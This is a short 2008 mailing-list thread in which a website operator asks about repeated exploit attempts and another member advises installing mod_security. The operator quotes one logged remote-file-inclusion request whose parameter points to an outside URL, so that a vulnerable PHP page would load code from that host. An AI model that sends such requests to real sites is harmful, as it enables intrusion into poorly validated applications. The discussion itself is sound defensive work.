Thank you for the heads up on mod_security.  I'm not sure if that is installed or not. Thanks again! ------------------------ Keith Smith --- On Wed, 12/3/08, JD Austin wrote: From: JD Austin Subject: Re: OT: Website Exploits To: klsmith2020@yahoo.com, "Main PLUG discussion list" Date: Wednesday, December 3, 2008, 3:48 PM That is a fairly common tactic.  It exploits poor input validation and register globals in PHP. Do yourself a huge favor and install mod_security (I assume you're using apache?) as an extra measure of security if you haven't already. On Wed, Dec 3, 2008 at 3:39 PM, keith smith wrote: Hi, I am working on a website that gets a lot of exploit attempts. They mostly look like this:  /index.php?display=http://humano.ya.com/mysons/index.htm? Our code is set to disregard any value that is not expected.  I'm wondering if there is a clearing house for reporting this type of stuff.  I have the IP address as reported.... if that is accurate. Thanks in advance! Keith --------------------------------------------------- PLUG-discuss mailing list - PLUG-discuss@lists.plug.phoenix.az.us To subscribe, unsubscribe, or to change your mail settings: http://lists.PLUG.phoenix.az.us/mailman/listinfo/plug-discuss --------------------------------------------------- PLUG-discuss mailing list - PLUG-discuss@lists.plug.phoenix.az.us To subscribe, unsubscribe, or to change your mail settings: http://lists.PLUG.phoenix.az.us/mailman/listinfo/plug-discuss